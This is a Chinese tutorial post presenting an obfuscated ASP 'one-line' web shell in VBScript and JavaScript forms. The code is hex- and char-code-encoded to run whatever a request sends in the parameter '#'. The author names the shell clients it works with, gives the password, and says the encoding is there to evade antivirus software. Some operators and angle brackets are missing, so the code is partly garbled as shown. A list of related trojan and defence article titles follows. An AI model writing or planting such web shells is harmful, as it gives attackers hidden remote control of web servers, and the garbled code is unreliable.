不知道怎样表达清楚。看例子吧:
复制代码 代码如下:
script language=vbs runat=server>
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
HextoStr="EXECUTE """""
C="CHR(H"
N=")"
Do While Len(data)>1
If IsNumeric(Left(data,1)) Then
HextoStr=HextoStrCLeft(data,2)N
data=Mid(data,3)
Else
HextoStr=HextoStrCLeft(data,4)N
data=Mid(data,5)
End If
Loop
End Function
/script>
SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode(
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))/SCRIPt>
不过加密后就不是一句话了,哈哈。这个s端用海阳或冰狐都可以连得上的,密码是#。
其实只是换写了script language=vbs runat=server> 这种方式,里边的代码可以用js或vbs等多种加密方式来加密解密了,省得asp只有微软的那个东东可以加密,同时省去了asp里的%号而已。当然不加密也可以,调用script language=vbs runat=server>那还是一句话,加密主要是为了躲过杀毒软件。
您可能感兴趣的文章:- 防范ASP木马的十大基本原则强列建议看下
- 一款不错的asp木马 黑色界面
- 清除网页中iframe木马的利器-淘特ASP木马扫描器
- asp.net jscript 一句话木马
- 更牛的一句话asp木马加密(去掉asp里的%)
- 隐藏ASP木马后门的两种方法
- asp一句话木马原理分析
- asp,php一句话木马整理方便查找木马
- 有效防止ASP木马上传运行—小知识[网络安全技术]
- ASP下检测图片木马的函数代码
- ASP防止图片木马上传的代码
- 一句话木马的原理及利用分析(asp,aspx,php,jsp)
- aspx超强木马查杀与防范(web网马)
- 如何防范ASP木马